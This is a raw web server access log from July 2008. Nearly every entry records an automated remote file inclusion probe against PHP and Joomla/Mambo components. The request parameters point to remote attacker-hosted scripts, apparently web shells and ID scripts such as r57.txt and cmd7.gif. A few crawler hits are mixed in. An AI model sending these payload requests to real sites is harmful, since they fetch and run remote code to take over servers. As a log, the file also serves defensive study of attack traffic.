207.218.234.146 - - [13/Jul/2008:09:22:52 -0700] "GET /logs/access_080329.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
128.122.79.161 - - [13/Jul/2008:09:22:54 -0700] "GET /logs/access_080228.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.piterx.xpg.com.br/r57.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.92.23.89 - - [13/Jul/2008:09:22:56 -0700] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.92.23.89 - - [13/Jul/2008:09:22:57 -0700] "GET //components/com_simpleboard/file_upload.php?sbp=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.15 - - [13/Jul/2008:09:23:20 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.141.56.49 - - [13/Jul/2008:09:23:28 -0700] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.49 - - [13/Jul/2008:09:23:28 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.49 - - [13/Jul/2008:09:23:29 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.49 - - [13/Jul/2008:09:23:42 -0700] "GET /logs/access_080110.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.85.102.132 - - [13/Jul/2008:09:23:44 -0700] "GET /bughttp://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
70.85.102.132 - - [13/Jul/2008:09:23:44 -0700] "GET /logs/bughttp://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
62.141.56.49 - - [13/Jul/2008:09:23:47 -0700] "GET /logs/access_080207.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.49 - - [13/Jul/2008:09:23:50 -0700] "GET /logs/access_080104.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.49 - - [13/Jul/2008:09:23:56 -0700] "GET /logs/access_080118.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.49 - - [13/Jul/2008:09:23:58 -0700] "GET /logs/access_080218.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.49 - - [13/Jul/2008:09:23:59 -0700] "GET /logs/access_080103.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
68.142.212.191 - - [13/Jul/2008:09:23:59 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0004.jpg HTTP/1.0" 200 512676 "-" "Mozilla/5.0 (Yahoo-MMCrawler/4.0; mailto:vertical-crawl-support@yahoo-inc.com)" "dmulk.com"
62.141.56.49 - - [13/Jul/2008:09:24:01 -0700] "GET /logs/access_080315.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
194.79.75.195 - - [13/Jul/2008:09:24:01 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/elsiavaria/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
194.79.75.195 - - [13/Jul/2008:09:24:01 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/elsiavaria/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
62.141.56.49 - - [13/Jul/2008:09:24:01 -0700] "GET /logs/access_080313.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.49 - - [13/Jul/2008:09:24:02 -0700] "GET /logs/access_080105.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.49 - - [13/Jul/2008:09:24:02 -0700] "GET /logs/access_071221.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.49 - - [13/Jul/2008:09:24:06 -0700] "GET /logs/access_071223.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.18.142.194 - - [13/Jul/2008:09:24:11 -0700] "GET /logs/index.php?content=http://www.fx-arts.de//contenido/cronjobs/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
64.18.142.194 - - [13/Jul/2008:09:24:14 -0700] "GET /index.php?content=http://www.fx-arts.de//contenido/cronjobs/cmd7.gif?? HTTP/1.1" 200 18441 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
62.141.56.49 - - [13/Jul/2008:09:24:15 -0700] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.49 - - [13/Jul/2008:09:24:15 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.49 - - [13/Jul/2008:09:24:16 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.49 - - [13/Jul/2008:09:24:49 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.151.102.50 - - [13/Jul/2008:09:25:03 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.151.102.50 - - [13/Jul/2008:09:25:04 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.141.56.49 - - [13/Jul/2008:09:25:04 -0700] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.49 - - [13/Jul/2008:09:25:05 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.49 - - [13/Jul/2008:09:25:05 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.72.112.223 - - [13/Jul/2008:09:25:14 -0700] "GET /logs//?_REQUEST=&_REQUEST%5boption%5d=com_phpshop&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://knightkittens.com/images/ma??? HTTP/1.1" 200 55998 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
64.72.112.223 - - [13/Jul/2008:09:25:14 -0700] "GET //?_REQUEST=&_REQUEST%5boption%5d=com_phpshop&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://knightkittens.com/images/ma??? HTTP/1.1" 200 50 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
62.141.56.49 - - [13/Jul/2008:09:25:16 -0700] "GET /logs/access_080118.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.221.130.15 - - [13/Jul/2008:09:25:31 -0700] "GET /logs/access_080103.log//skin/zero_vote/error.php?dir=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.141.56.49 - - [13/Jul/2008:09:25:32 -0700] "GET /logs/access_080110.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.6.155.114 - - [13/Jul/2008:09:25:43 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.6.155.114 - - [13/Jul/2008:09:25:51 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.79.75.195 - - [13/Jul/2008:09:25:52 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/sofiawila/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.79.75.195 - - [13/Jul/2008:09:25:53 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/sofiawila/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.102.21.29 - - [13/Jul/2008:09:26:00 -0700] "GET /logs///plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.handowire.com/bbs/Paddy/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
194.79.75.195 - - [13/Jul/2008:09:26:15 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/sofiawila/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.141.56.49 - - [13/Jul/2008:09:26:17 -0700] "GET /logs/access_080117.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
196.202.144.245 - - [13/Jul/2008:09:26:25 -0700] "GET /logs/index.php?inject%20http://www.thelostknightsguild.com/tmp/t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
196.202.144.245 - - [13/Jul/2008:09:26:26 -0700] "GET /index.php?inject%20http://www.thelostknightsguild.com/tmp/t.txt??? HTTP/1.1" 200 18393 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
208.80.193.43 - - [13/Jul/2008:09:26:30 -0700] "GET / HTTP/1.0" 200 18237 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; DT)" "dmulk.com"
91.198.175.18 - - [13/Jul/2008:09:26:46 -0700] "GET /logs/access_080425.log/index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.oryapiinsaat.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.110.250.75 - - [13/Jul/2008:09:26:47 -0700] "GET //main.php?sayfa=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.102.21.29 - - [13/Jul/2008:09:26:52 -0700] "GET ///program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.handowire.com/bbs/Paddy/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.249.73.55 - - [13/Jul/2008:09:26:59 -0700] "GET /blog/?show=slide&pageid=159 HTTP/1.1" 200 37831 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
194.79.75.195 - - [13/Jul/2008:09:27:07 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/sofiawila/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
59.188.5.164 - - [13/Jul/2008:09:27:17 -0700] "GET /index.php?content=http://www.pipistrello.helloweb.eu/albania1.txt? HTTP/1.1" 200 18417 "-" "libwww-perl/5.812" "www.dmulk.com"
89.31.24.64 - - [13/Jul/2008:09:27:21 -0700] "GET /logs/access_080225.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.31.24.64 - - [13/Jul/2008:09:27:21 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.31.24.64 - - [13/Jul/2008:09:27:22 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.85.130.159 - - [13/Jul/2008:09:27:49 -0700] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.113.24.150 - - [13/Jul/2008:09:27:52 -0700] "GET /logs//admin/admin.php?vwar_root=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.150 - - [13/Jul/2008:09:27:52 -0700] "GET //admin/admin.php?vwar_root=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.204.217.1 - - [13/Jul/2008:09:27:53 -0700] "GET /logs/access_080212.log/index.php?option=com_chronocontacthttp://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.253.162.5 - - [13/Jul/2008:09:28:01 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.198.175.18 - - [13/Jul/2008:09:28:27 -0700] "GET /logs/access_080321.log/index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.oryapiinsaat.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
43.244.132.32 - - [13/Jul/2008:09:29:13 -0700] "GET /logs/access_080118.log/classes/core/language.php?rootdir=http://www.iglesialcs.cl/newweb//images/stories/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "www.dmulk.com"
43.244.132.32 - - [13/Jul/2008:09:29:13 -0700] "GET /classes/core/language.php?rootdir=http://www.iglesialcs.cl/newweb//images/stories/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "www.dmulk.com"
43.244.132.32 - - [13/Jul/2008:09:29:13 -0700] "GET /logs/classes/core/language.php?rootdir=http://www.iglesialcs.cl/newweb//images/stories/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "www.dmulk.com"
194.79.75.195 - - [13/Jul/2008:09:31:13 -0700] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/sofiawila/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.79.75.195 - - [13/Jul/2008:09:31:14 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/sofiawila/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.221.143.111 - - [13/Jul/2008:09:31:57 -0700] "GET //skin/zero_vote/error.php?dir=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.143.233.40 - - [13/Jul/2008:09:32:22 -0700] "GET /logs/index.php?option=com_estateagent&Itemid=&mosConfig_absolute_path=http://www.terrazon.com.ar/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.234.163.201 - - [13/Jul/2008:09:32:31 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.143.233.40 - - [13/Jul/2008:09:32:35 -0700] "GET /index.php?option=com_estateagent&Itemid=&mosConfig_absolute_path=http://www.terrazon.com.ar/bajo.txt? HTTP/1.1" 200 18501 "-" "libwww-perl/5.79" "www.dmulk.com"
205.234.163.201 - - [13/Jul/2008:09:32:36 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 200 18541 "-" "libwww-perl/5.810" "www.dmulk.com"
91.198.175.18 - - [13/Jul/2008:09:32:49 -0700] "GET /logs/access_080225.log/index.php?option=com_estateagent&Itemid=&mosConfig_absolute_path=http://www.oryapiinsaat.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.139.226 - - [13/Jul/2008:09:32:54 -0700] "GET /logs/access_080507.log/index.php?option=com_messages&Itemid=&mosConfig_absolute_path=http://www.hotelberberys.pl/includes/domit/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [13/Jul/2008:09:32:57 -0700] "GET /index.php?option=com_messages&Itemid=&mosConfig_absolute_path=http://www.hotelberberys.pl/includes/domit/ips.txt? HTTP/1.1" 200 18533 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [13/Jul/2008:09:32:57 -0700] "GET /logs/index.php?option=com_messages&Itemid=&mosConfig_absolute_path=http://www.hotelberberys.pl/includes/domit/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.221.143.111 - - [13/Jul/2008:09:33:15 -0700] "GET //skin/zero_vote/error.php?dir=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.246.61.63 - - [13/Jul/2008:09:33:35 -0700] "GET /logs/access_080212.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.210.113.58 - - [13/Jul/2008:09:33:36 -0700] "GET /logs//sub.php?s=http://www.ireo.org//administrator/components/com_joomla-visites/core/include/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.210.113.58 - - [13/Jul/2008:09:33:36 -0700] "GET /logs//sub.php?s=http://www.ireo.org//administrator/components/com_joomla-visites/core/include/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.210.113.58 - - [13/Jul/2008:09:33:36 -0700] "GET //sub.php?s=http://www.ireo.org//administrator/components/com_joomla-visites/core/include/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.210.113.58 - - [13/Jul/2008:09:33:36 -0700] "GET //sub.php?s=http://www.ireo.org//administrator/components/com_joomla-visites/core/include/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.20.163.130 - - [13/Jul/2008:09:33:49 -0700] "GET /logs/access_080329.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.topshoppingcenters.com/mvk/bot/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.20.163.130 - - [13/Jul/2008:09:33:53 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.topshoppingcenters.com/mvk/bot/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.20.163.130 - - [13/Jul/2008:09:33:57 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.topshoppingcenters.com/mvk/bot/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.20.163.130 - - [13/Jul/2008:09:34:03 -0700] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.topshoppingcenters.com/mvk/bot/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.139.226 - - [13/Jul/2008:09:34:55 -0700] "GET /logs/access_080330.log/index.php?option=com_messages&Itemid=&mosConfig_absolute_path=http://www.hotelberberys.pl/includes/domit/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.116.91.54 - - [13/Jul/2008:09:35:05 -0700] "GET /logs//sub.php?s=http://www.ireo.org//administrator/components/com_joomla-visites/core/include/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.116.91.54 - - [13/Jul/2008:09:35:05 -0700] "GET /logs//sub.php?s=http://www.ireo.org//administrator/components/com_joomla-visites/core/include/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.116.91.54 - - [13/Jul/2008:09:35:06 -0700] "GET //sub.php?s=http://www.ireo.org//administrator/components/com_joomla-visites/core/include/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.116.91.54 - - [13/Jul/2008:09:35:06 -0700] "GET //sub.php?s=http://www.ireo.org//administrator/components/com_joomla-visites/core/include/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.199.190.37 - - [13/Jul/2008:09:36:28 -0700] "GET //sub.php?s=http://www.ireo.org//administrator/components/com_joomla-visites/core/include/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.79.75.195 - - [13/Jul/2008:09:36:39 -0700] "GET /logs/access_080110.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/sofiawila/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.20.163.130 - - [13/Jul/2008:09:36:52 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.topshoppingcenters.com/mvk/bot/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.116.91.54 - - [13/Jul/2008:09:37:01 -0700] "GET //sub.php?s=http://www.ireo.org//administrator/components/com_joomla-visites/core/include/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.116.91.54 - - [13/Jul/2008:09:37:02 -0700] "GET //sub.php?s=http://www.ireo.org//administrator/components/com_joomla-visites/core/include/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.18.245 - - [13/Jul/2008:09:37:14 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
194.79.75.195 - - [13/Jul/2008:09:37:22 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/sofiawila/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.79.75.195 - - [13/Jul/2008:09:37:24 -0700] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/sofiawila/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.141.56.49 - - [13/Jul/2008:09:37:24 -0700] "GET /logs/access_080207.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
